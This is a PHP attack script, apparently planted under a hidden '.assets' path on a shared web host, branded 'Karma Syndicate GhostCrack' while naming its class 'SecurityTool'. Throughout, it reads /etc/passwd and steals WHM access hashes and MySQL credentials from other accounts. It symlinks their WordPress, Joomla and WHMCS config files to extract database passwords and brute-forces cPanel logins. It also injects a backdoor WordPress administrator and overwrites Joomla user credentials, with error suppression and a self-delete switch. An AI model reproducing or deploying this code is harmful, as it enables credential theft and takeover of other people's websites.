File: /home6/cco26461/public_html/.assets/2168ccff-843f-40f4-bec6-2901c707c1c0.php
<?php
error_reporting(0);
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);
if (isset($_GET['action']) && $_GET['action'] === 'delete') {
$script_path = $_SERVER['DOCUMENT_ROOT'] . parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
$delete_result = unlink($script_path);
$response = [
'status' => $delete_result ? 'success' : 'error',
'message' => $delete_result ? 'Script deleted successfully' : 'Failed to delete script',
'file_path' => $script_path,
'error' => $delete_result ? null : error_get_last()
];
header('Content-Type: application/json');
echo json_encode($response);
exit;
}
class SecurityTool {
private $results = [
'accesshash' => ['success' => false, 'count' => 0, 'message' => ''],
'cpanel' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
'symlink' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
'bruteforce' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
'wordpress' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
'joomla' => ['success' => false, 'count' => 0, 'message' => 'not executed']
];
private $results_dir = "ghost_results";
private function ensureResultsDir() {
if (!is_dir($this->results_dir)) {
@mkdir($this->results_dir, 0755, true);
}
}
private function accessHashFinder() {
try {
$names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if ($names === false) {
$names = [$this->getCurrentUser()];
}
$this->ensureResultsDir();
foreach ($names as $name) {
$user = explode(':', $name)[0];
$folder = "/home/{$user}/.accesshash";
if (@is_readable($folder)) {
$this->results['accesshash']['count']++;
$content = str_replace("\n", "", @file_get_contents($folder));
$result_content = "WHM {$user}:{$content}\n";
@file_put_contents("{$this->results_dir}/accesshash_results.txt", $result_content, FILE_APPEND);
}
}
$this->results['accesshash']['success'] = $this->results['accesshash']['count'] > 0;
$this->results['accesshash']['message'] = $this->results['accesshash']['success'] ? 'success' : 'failed';
} catch (Exception $e) {
$this->results['accesshash']['message'] = 'failed';
}
}
private function cpFinder() {
try {
$names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if ($names === false) {
$names = [$this->getCurrentUser()];
}
$this->ensureResultsDir();
foreach ($names as $name) {
$user = explode(':', $name)[0];
$folder = "/home/{$user}/.my.cnf";
if (@is_readable($folder)) {
$this->results['cpanel']['count']++;
$content = @file_get_contents($folder);
$result_content = "User: {$user}\nContent:\n{$content}\n\n";
@file_put_contents("{$this->results_dir}/cpanel_results.txt", $result_content, FILE_APPEND);
}
}
$this->results['cpanel']['success'] = $this->results['cpanel']['count'] > 0;
$this->results['cpanel']['message'] = $this->results['cpanel']['success'] ? 'success' : 'failed';
} catch (Exception $e) {
$this->results['cpanel']['message'] = 'failed';
}
}
private function symlinkAndBruteforce() {
try {
$names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if ($names === false) {
$names = [$this->getCurrentUser()];
}
if (!@is_dir('ghost_sym')) {
@mkdir('ghost_sym', 0755, true);
}
if (@is_dir('ghost_sym')) {
@chdir('ghost_sym');
$htaccess = "Options Indexes FollowSymLinks\nDirectoryIndex achon666ju5t.extremecrew\nAddType txt .php\nAddHandler txt .php";
@file_put_contents('.htaccess', $htaccess);
}
$config_files = [
"wp-config.php", "wp/wp-config.php", "WP/wp-config.php",
"wp/beta/wp-config.php", "beta/wp-config.php", "press/wp-config.php",
"wordpress/wp-config.php", "Wordpress/wp-config.php", "blog/wp-config.php",
"config.php", "news/wp-config.php", "new/wp-config.php",
"blogs/wp-config.php", "home/wp-config.php", "db.php",
"site/wp-config.php", "main/wp-config.php", "test/wp-config.php",
"configuration.php", "blog/configuration.php", "joomla/configuration.php",
"cms/configuration.php", "portal/configuration.php", "news/configuration.php",
"home/configuration.php", "www/configuration.php", "site/configuration.php",
"sites/configuration.php", "vb/includes/config.php", "whm/configuration.php",
"central/configuration.php", "whm/whmcs/configuration.php",
"whm/WHMCS/configuration.php", "whmc/WHM/configuration.php",
"support/configuration.php", "submitticket.php",
"whm/configuration.php", "drupal/sites/default/settings.php",
"drupal7/sites/default/settings.php", "sites/default/settings.php",
"vb/includes/config.php", "includes/config.php", "forum/includes/config.php",
"forums/includes/config.php", "cc/includes/config.php", "inc/config.php", "includes/configure.php",
"shop/includes/configure.php", "os/includes/configure.php", "oscom/includes/configure.php",
"products/includes/configure.php", "cart/includes/configure.php", "inc/conf_global.php",
"wp-config.php", "wp/test/wp-config.php", "blog/wp-config.php",
"beta/wp-config.php", "portal/wp-config.php", "site/wp-config.php", "wp/wp-config.php",
"WP/wp-config.php", "news/wp-config.php", "wordpress/wp-config.php", "test/wp-config.php",
"demo/wp-config.php", "home/wp-config.php", "v1/wp-config.php", "v2/wp-config.php",
"press/wp-config.php", "new/wp-config.php", "blogs/wp-config.php",
"configuration.php", "blog/configuration.php", "submitticket.php",
"cms/configuration.php", "beta/configuration.php", "portal/configuration.php",
"site/configuration.php", "main/configuration.php", "home/configuration.php",
"demo/configuration.php", "test/configuration.php", "v1/configuration.php",
"v2/configuration.php", "joomla/configuration.php", "new/configuration.php",
"WHMCS/configuration.php", "whmcs1/configuration.php", "whmcs/configuration.php",
"WHMC/configuration.php", "whmc/configuration.php", "WHM/configuration.php",
"Whm/configuration.php", "whm/configuration.php",
"HOST/configuration.php", "Host/configuration.php",
"host/configuration.php", "SUPPORTES/configuration.php",
"Supportes/configuration.php", "supportes/configuration.php",
"domains/configuration.php", "domain/configuration.php",
"Hosting/configuration.php", "HOSTING/configuration.php",
"hosting/configuration.php", "CART/configuration.php",
"Cart/configuration.php", "cart/configuration.php",
"ORDER/configuration.php", "Order/configuration.php",
"order/configuration.php", "CLIENT/configuration.php",
"Client/configuration.php", "client/configuration.php",
"CLIENTAREA/configuration.php", "Clientarea/configuration.php",
"clientarea/configuration.php", "SUPPORT/configuration.php",
"Support/configuration.php", "support/configuration.php",
"BILLING/configuration.php", "Billing/configuration.php",
"billing/configuration.php", "BUY/configuration.php",
"Buy/configuration.php", "buy/configuration.php",
"MANAGE/configuration.php", "Manage/configuration.php",
"manage/configuration.php", "CLIENTSUPPORT/configuration.php",
"ClientSupport/configuration.php", "Clientsupport/configuration.php",
"clientsupport/configuration.php", "CHECKOUT/configuration.php",
"Checkout/configuration.php", "checkout/configuration.php",
"BILLINGS/configuration.php", "Billings/configuration.php",
"billings/configuration.php", "BASKET/configuration.php",
"Basket/configuration.php", "basket/configuration.php",
"SECURE/configuration.php", "Secure/configuration.php",
"secure/configuration.php", "SALES/configuration.php",
"Sales/configuration.php", "sales/configuration.php",
"BILL/configuration.php", "Bill/configuration.php",
"bill/configuration.php", "PURCHASE/configuration.php",
"Purchase/configuration.php", "purchase/configuration.php",
"ACCOUNT/configuration.php", "Account/configuration.php",
"account/configuration.php", "USER/configuration.php",
"User/configuration.php", "user/configuration.php",
"CLIENTS/configuration.php", "Clients/configuration.php",
"clients/configuration.php", "BILLINGS/configuration.php",
"Billings/configuration.php", "billings/configuration.php",
"MY/configuration.php", "My/configuration.php",
"my/configuration.php", "secure/whm/configuration.php",
"secure/whmcs/configuration.php", "panel/configuration.php",
"clientes/configuration.php", "cliente/configuration.php",
"support/order/configuration.php", "bb-config.php",
"boxbilling/bb-config.php", "box/bb-config.php",
"host/bb-config.php", "Host/bb-config.php",
"supportes/bb-config.php", "support/bb-config.php",
"hosting/bb-config.php", "cart/bb-config.php",
"order/bb-config.php", "client/bb-config.php",
"clients/bb-config.php", "cliente/bb-config.php",
"clientes/bb-config.php", "billing/bb-config.php",
"billings/bb-config.php", "my/bb-config.php",
"secure/bb-config.php", "support/order/bb-config.php",
"includes/dist-configure.php", "zencart/includes/dist-configure.php",
"products/includes/dist-configure.php", "cart/includes/dist-configure.php",
"shop/includes/dist-configure.php", "includes/iso4217.php",
"hostbills/includes/iso4217.php", "host/includes/iso4217.php",
"Host/includes/iso4217.php", "supportes/includes/iso4217.php",
"support/includes/iso4217.php", "hosting/includes/iso4217.php",
"cart/includes/iso4217.php", "order/includes/iso4217.php",
"client/includes/iso4217.php", "clients/includes/iso4217.php",
"cliente/includes/iso4217.php", "clientes/includes/iso4217.php",
"billing/includes/iso4217.php", "billings/includes/iso4217.php",
"my/includes/iso4217.php", "secure/includes/iso4217.php",
"support/order/includes/iso4217.php"
];
foreach ($names as $name) {
$user = explode(':', $name)[0];
foreach ($config_files as $confurl) {
$symlink_path = "{$user}~{$confurl}.txt";
if (@symlink("/home/{$user}/public_html/{$confurl}", $symlink_path)) {
$this->results['symlink']['count']++;
}
}
}
$this->results['symlink']['success'] = $this->results['symlink']['count'] > 0;
$this->results['symlink']['message'] = $this->results['symlink']['success'] ? 'success' : 'failed';
if ($this->results['symlink']['success']) {
$url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/";
$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 30
]);
$response = @curl_exec($curl);
if ($response !== false) {
preg_match_all('#<a href="([^"]+)"#', $response, $configs);
$passwords_list = '';
foreach ($configs[1] as $config) {
if (strpos($config, '.txt') !== false) {
$file_url = $url . $config;
$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_URL => $file_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 30
]);
$content = @curl_exec($curl);
@curl_close($curl);
if ($content) {
$patterns = [
"#'DB_PASSWORD', '(.*?)'#" => 'wordpress',
"#password = '(.*?)'#" => 'joomla'
];
foreach ($patterns as $pattern => $type) {
if (preg_match($pattern, $content, $match)) {
$passwords_list .= $match[1] . "\n";
break;
}
}
}
}
}
}
@curl_close($curl);
if (!empty($passwords_list)) {
$users = array_filter(explode("\n", trim(implode("\n", array_map(function($name) { return explode(':', $name)[0]; }, $names)))));
$passwords = array_filter(explode("\n", trim($passwords_list)));
$cpanel_found = 0;
$this->ensureResultsDir();
foreach ($users as $user) {
foreach ($passwords as $pwd) {
$connection = @fsockopen('localhost', 2082, $errno, $errstr, 5);
if ($connection) {
fclose($connection);
$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_URL => "http://localhost:2082/login/",
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query(['user' => $user, 'pass' => $pwd]),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_FOLLOWLOCATION => false
]);
$response = @curl_exec($curl);
if ($response !== false && strpos($response, 'Location: /cpsess') !== false) {
$cpanel_found++;
@file_put_contents("{$this->results_dir}/bruteforce_results.txt", "User: {$user}\nPassword: {$pwd}\n\n", FILE_APPEND);
}
@curl_close($curl);
}
}
}
$this->results['bruteforce']['success'] = $cpanel_found > 0;
$this->results['bruteforce']['count'] = $cpanel_found;
$this->results['bruteforce']['message'] = $this->results['bruteforce']['success'] ? 'success' : 'failed';
} else {
$this->results['bruteforce']['message'] = 'failed';
}
}
} catch (Exception $e) {
$this->results['symlink']['message'] = 'failed';
$this->results['bruteforce']['message'] = 'failed';
}
}
private function wpMassUserAdder($symlink_path) {
try {
if (!$this->results['symlink']['success']) {
$this->results['wordpress']['message'] = 'failed';
return;
}
$url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/";
$curl = curl_init();
curl_setopt_array($curl, [CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true]);
$response = @curl_exec($curl);
@curl_close($curl);
if ($response === false) {
$this->results['wordpress']['message'] = 'failed';
return;
}
preg_match_all('#<a href="([^"]+)"#', $response, $configs);
foreach ($configs[1] as $config) {
if (strpos($config, 'wp-config.php.txt') !== false) {
@chdir($symlink_path);
$curl = curl_init();
curl_setopt_array($curl, [CURLOPT_URL => $url . $config, CURLOPT_RETURNTRANSFER => true]);
$content = @curl_exec($curl);
@curl_close($curl);
if ($content) {
preg_match("#'DB_HOST', '(.*?)'#", $content, $host);
preg_match("#'DB_PASSWORD', '(.*?)'#", $content, $pass);
preg_match("#'DB_USER', '(.*?)'#", $content, $user);
preg_match("#'DB_NAME', '(.*?)'#", $content, $name);
preg_match("#table_prefix\s*= '(.*?)'#", $content, $prefix);
if ($host && $user && $pass && $name && $prefix) {
$connect = @mysqli_connect($host[1], $user[1], $pass[1], $name[1]);
if ($connect) {
$prefix = $prefix[1];
$queries = [
"INSERT INTO `{$prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`)
VALUES ('GhostCrack', '5ae11ae4c4da98d616377f2c1543f796', 'firstname lastname', 'email@example.com', '0')",
"INSERT INTO `{$prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)
VALUES (LAST_INSERT_ID(), '{$prefix}capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')",
"INSERT INTO `{$prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)
VALUES (LAST_INSERT_ID(), '{$prefix}user_level', '10')"
];
$success = true;
foreach ($queries as $query) {
$success = $success && @mysqli_query($connect, $query);
}
$siteurl_query = @mysqli_query($connect, "SELECT `option_value` FROM `{$prefix}options` WHERE `option_name`='siteurl'");
$siteurl = $siteurl_query ? @mysqli_fetch_array($siteurl_query, MYSQLI_ASSOC)['option_value'] : '';
if ($success && $siteurl) {
$this->results['wordpress']['count']++;
@file_put_contents("{$this->results_dir}/wordpress_results.txt",
"URL: {$siteurl}/wp-login.php\nUsername: GhostCrack\nPassword: Karma@Syndicate#GhostCrack\n\n", FILE_APPEND);
}
@mysqli_close($connect);
}
}
}
}
}
$this->results['wordpress']['success'] = $this->results['wordpress']['count'] > 0;
$this->results['wordpress']['message'] = $this->results['wordpress']['success'] ? 'success' : 'failed';
} catch (Exception $e) {
$this->results['wordpress']['message'] = 'failed';
}
}
private function joomlaMassUserChanger($symlink_path) {
try {
if (!$this->results['symlink']['success']) {
$this->results['joomla']['message'] = 'failed';
return;
}
$url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/";
$curl = curl_init();
curl_setopt_array($curl, [CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true]);
$response = @curl_exec($curl);
@curl_close($curl);
if ($response === false) {
$this->results['joomla']['message'] = 'failed';
return;
}
preg_match_all('#<a href="([^"]+)"#', $response, $configs);
foreach ($configs[1] as $config) {
if (strpos($config, 'configuration.php.txt') !== false) {
@chdir($symlink_path);
$curl = curl_init();
curl_setopt_array($curl, [CURLOPT_URL => $url . $config, CURLOPT_RETURNTRANSFER => true]);
$content = @curl_exec($curl);
@curl_close($curl);
if ($content) {
preg_match('#\$host = \'(.*?)\'#i', $content, $host);
preg_match('#\$password = \'(.*?)\'#i', $content, $pass);
preg_match('#\$user = \'(.*?)\'#i', $content, $user);
preg_match('#\$db = \'(.*?)\'#i', $content, $name);
preg_match('#\$dbprefix = \'(.*?)\'#i', $content, $prefix);
preg_match("#mailfrom = '(.*?)@(.*?)'#i", $content, $site_url);
if ($host && $user && $pass && $name && $prefix && $site_url) {
$con = @mysqli_connect($host[1], $user[1], $pass[1], $name[1]);
if ($con) {
$query = "UPDATE {$prefix[1]}users SET username='administrator',
password='5ae11ae4c4da98d616377f2c1543f796'";
if (@mysqli_query($con, $query)) {
$this->results['joomla']['count']++;
@file_put_contents("{$this->results_dir}/joomla_results.txt",
"URL: http://{$site_url[2]}/administrator\nUsername: administrator\nPassword: Karma@Syndicate#GhostCrack\n\n", FILE_APPEND);
}
@mysqli_close($con);
}
}
}
}
}
$this->results['joomla']['success'] = $this->results['joomla']['count'] > 0;
$this->results['joomla']['message'] = $this->results['joomla']['success'] ? 'success' : 'failed';
} catch (Exception $e) {
$this->results['joomla']['message'] = 'failed';
}
}
private function getCurrentUser() {
return function_exists('posix_getpwuid') && function_exists('posix_getuid')
? posix_getpwuid(posix_getuid())['name']
: (isset($_SERVER['USER']) ? $_SERVER['USER'] : 'unknown');
}
private function outputResults() {
header('Content-Type: text/plain');
echo "=== Karma Syndicate GhostCrack Results ===\n\n";
foreach ($this->results as $key => $result) {
echo strtoupper($key) . ": " . $result['message'] . "\n";
}
}
public function run() {
$base_dir = getcwd();
$symlink_path = $base_dir . "/ghost_sym";
$this->accessHashFinder();
@chdir($base_dir);
if (!$this->results['accesshash']['success']) {
$this->cpFinder();
@chdir($base_dir);
$this->symlinkAndBruteforce();
@chdir($base_dir);
if ($this->results['symlink']['success']) {
$this->wpMassUserAdder($symlink_path);
@chdir($base_dir);
$this->joomlaMassUserChanger($symlink_path);
@chdir($base_dir);
}
}
$this->outputResults();
}
}
$tool = new SecurityTool();
$tool->run();